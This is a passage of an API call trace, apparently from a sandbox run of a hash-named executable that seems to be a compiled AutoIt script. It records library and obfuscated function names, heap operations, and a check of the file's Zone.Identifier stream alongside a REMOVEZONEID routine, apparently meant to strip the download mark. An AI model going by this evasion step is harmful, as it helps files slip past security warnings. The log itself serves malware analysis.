cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0119.580] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0119.580] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0119.580] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0119.580] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0119.580] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0119.580] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0119.580] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0119.580] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0119.580] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0119.581] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0119.581] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0119.581] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0119.581] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0119.581] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0119.581] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0119.581] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0119.581] CharUpperBuffW (in: lpsz="DBRUAIEIBZEWRGBQ", cchLength=0x10 | out: lpsz="DBRUAIEIBZEWRGBQ") returned 0x10 [0119.581] CharUpperBuffW (in: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY", cchLength=0x19 | out: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY") returned 0x19 [0119.581] CharUpperBuffW (in: lpsz="ACL", cchLength=0x3 | out: lpsz="ACL") returned 0x3 [0119.581] CharUpperBuffW (in: lpsz="DHVWRCDTHNKPWFW", cchLength=0xf | out: lpsz="DHVWRCDTHNKPWFW") returned 0xf [0119.582] CharUpperBuffW (in: lpsz="KHOCWHDEQXMSTFPOADRL", cchLength=0x14 | out: lpsz="KHOCWHDEQXMSTFPOADRL") returned 0x14 [0119.582] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0119.582] CharUpperBuffW (in: lpsz="ASAZRREHKGLB", cchLength=0xc | out: lpsz="ASAZRREHKGLB") returned 0xc [0119.582] CharUpperBuffW (in: lpsz="RSDBBCVUCE", cchLength=0xa | out: lpsz="RSDBBCVUCE") returned 0xa [0119.582] CharUpperBuffW (in: lpsz="AJJMOCPPKFEWODWKA", cchLength=0x11 | out: lpsz="AJJMOCPPKFEWODWKA") returned 0x11 [0119.582] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0119.582] CharUpperBuffW (in: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP", cchLength=0x1b | out: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP") returned 0x1b [0119.582] CharUpperBuffW (in: lpsz="SVEJXXJSKKUJZCUYVMSHAEL", cchLength=0x17 | out: lpsz="SVEJXXJSKKUJZCUYVMSHAEL") returned 0x17 [0119.582] CharUpperBuffW (in: lpsz="QKSYGMNMNUOEXHVWRRODCJH", cchLength=0x17 | out: lpsz="QKSYGMNMNUOEXHVWRRODCJH") returned 0x17 [0119.582] CharUpperBuffW (in: lpsz="LLBUPLMSHANIDLHCMEMP", cchLength=0x14 | out: lpsz="LLBUPLMSHANIDLHCMEMP") returned 0x14 [0119.582] CharUpperBuffW (in: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV", cchLength=0x1d | out: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV") returned 0x1d [0119.582] CharUpperBuffW (in: lpsz="MIVVMSGJPNONEWUB", cchLength=0x10 | out: lpsz="MIVVMSGJPNONEWUB") returned 0x10 [0119.582] CharUpperBuffW (in: lpsz="GETDIR", cchLength=0x6 | out: lpsz="GETDIR") returned 0x6 [0119.583] CharUpperBuffW (in: lpsz="REMOVEZONEID", cchLength=0xc | out: lpsz="REMOVEZONEID") returned 0xc [0119.583] CharUpperBuffW (in: lpsz="REMOVEZONEID", cchLength=0xc | out: lpsz="REMOVEZONEID") returned 0xc [0119.583] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7cf5b8, nSize=0x7fff | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0x62 [0119.583] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7bf5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0119.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd190 [0119.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef690 [0119.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef610 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef510 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef690 [0119.584] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe:Zone.Identifier", nBufferLength=0x7fff, lpBuffer=0x7cf7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe:Zone.Identifier", lpFilePart=0x0) returned 0x72 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf0) returned 0x1302d48 [0119.584] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe:zone.identifier")) returned 0xffffffff [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd148 [0119.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6a0 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4f0 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xb0) returned 0x1303148 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf0) returned 0x1303e48 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2e0 | out: hHeap=0x12c0000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3460 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3148 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303148 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3460 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd148 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6a0 | out: hHeap=0x12c0000) returned 1 [0119.586] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe:Zone.Identifier", lpFindFileData=0x7df830 | out: lpFindFileData=0x7df830*(dwFileAttributes=0x14bd238, ftCreationTime.dwLowDateTime=0x12ef310, ftCreationTime.dwHighDateTime=0x14bcad0, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x207d0, ftLastWriteTime.dwHighDateTime=0x20000, nFileSizeHigh=0x18, nFileSizeLow=0x0, dwReserved0=0x1491ce0, dwReserved1=0x14b5e00, cFileName="", cAlternateFileName="ﴼ}")) returned 0xffffffff [0119.586] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3148 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef690 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302d48 | out: hHeap=0x12c0000) returned 1 [0119.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef610 | out: hHeap=0x12c0000) returned 1 [0119.587] GetLastError () returned 0x6 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd190 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd238 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.587] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3340 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.587] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef510 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0119.587] CharUpperBuffW (in: lpsz="KHOCWHDEQXMSTFPOADRL", cchLength=0x14 | out: lpsz="KHOCWHDEQXMSTFPOADRL") returned 0x14 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0119.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef560 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fece0 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd220 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef570 [0119.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed80 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3460 [0119.588] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd148 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd190 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5d0 [0119.588] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef60 [0119.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd0d0 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef690 [0119.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd0d0 | out: hHeap=0x12c0000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feda8 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd0d0 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2c8 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6a0 [0119.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2c8 | out: hHeap=0x12c0000) returned 1 [0119.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6a0 | out: hHeap=0x12c0000) returned 1 [0119.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee20 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1a8 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef610 [0119.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1a8 | out: hHeap=0x12c0000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed08 [0119.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1a8 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6a0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd250 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0119.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5c0 [0119.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.591] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0119.591] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feba0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef510 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd238 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd268 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2c8 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0119.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0119.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef4e0 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3730 [0119.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.593] RtlAllocateHeap 